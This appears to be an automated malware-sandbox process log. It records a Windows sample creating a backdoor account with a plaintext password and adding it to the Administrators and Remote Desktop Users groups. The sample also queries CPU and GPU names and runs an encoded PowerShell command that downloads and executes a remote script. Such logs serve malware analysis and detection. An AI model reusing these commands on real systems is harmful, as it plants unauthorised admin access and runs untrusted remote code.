C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc qircnO4G /add1⤵PID:3948
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc qircnO4G /add2⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc qircnO4G /add3⤵PID:2884
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:3580
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:2204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵PID:2512
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵PID:2184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:2244
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1512
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2764
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc qircnO4G1⤵PID:3576
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc qircnO4G2⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc qircnO4G3⤵PID:2448
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:644
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:3580
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1040
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:1740
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3992
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3916
-
-